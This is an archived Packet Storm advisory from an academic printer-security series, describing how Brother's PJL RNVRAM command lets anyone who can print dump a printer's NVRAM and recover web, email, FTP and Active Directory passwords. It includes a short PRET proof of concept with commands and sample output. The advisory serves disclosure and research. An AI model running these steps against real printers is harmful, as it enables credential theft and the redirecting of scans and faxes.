exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hacking Printers Advisory 3

Hacking Printers Advisory 3
Posted Jan 31, 2017
Authored by Jens Mueller

This post is about abusing Brother's proprietary PJL extensions to dump the printers NVRAM and gain access to interesting stuff like passwords.

tags | advisory
SHA-256 | 64ec02b37690bb546138e1297152bd405cb48e04234c442b4a8aec0a22fd3850

Hacking Printers Advisory 3

Change Mirror Download
TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 3 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
abusing Brother's proprietary PJL extensions to dump the printers NVRAM
and gain access to interesting stuff like passwords. The attack can be
performed by anyone who can print, for example through USB or network.
It can even be carried out by a malicious website, using advanced
cross-site printing techniques in combination with a novel technique we
call `CORS spoofing' (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

======================[ Memory Access with PJL ]======================

-------------------------[ Affected Devices ]-------------------------

This vulnerability may potentially affect all Brother based laser
printers. It has been verfied for the devices listed below:

- Brother MFC-9120CN (Firmware version: K.1.06)
- Brother DCP-9045CDN (Firmware version: G.1.10)
- Konica Minolta bizhub 20p (Firmware version: 3.11)

Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The `Brother Laser Printer Technical Reference Guide' defines PJL
commands to `write data to or retrieve data from the specified address
of the printer's NVRAM':

----------------------------------------------------------------------
@PJL RNVRAM ADDRESS = X
----------------------------------------------------------------------

By incrementing the integer X and dumping the whole NVRAM an attacker
can gain access to the embedded web server passwords. Furthermore a if
set a user PINs, passwords for POP3/SMTP as well as for FTP and Active
Directory profiles can be obtained. For MFPs, the attacker may also be
able to change the Scan-to-FTP settings, so scanned documents are
delivered to an attacker-controlled FTP server or she can exchange fax
numbers in the address book whereby fax is sent to the attacker's fax
number instead.

This issue is not new. It has been discussed by Andrei Costin and
others. However it still seems to be present in Brother devices.

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. The attack can be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

-----------------------[ Further Information ]------------------------

Information on Brother's nvram access bug/feature can be found at:
http://hacking-printers.net/wiki/index.php/Memory_access
http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf
http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf
http://seclists.org/fulldisclosure/2013/Feb/40


Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    20 Files
  • 31
    Jan 31st
    31 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close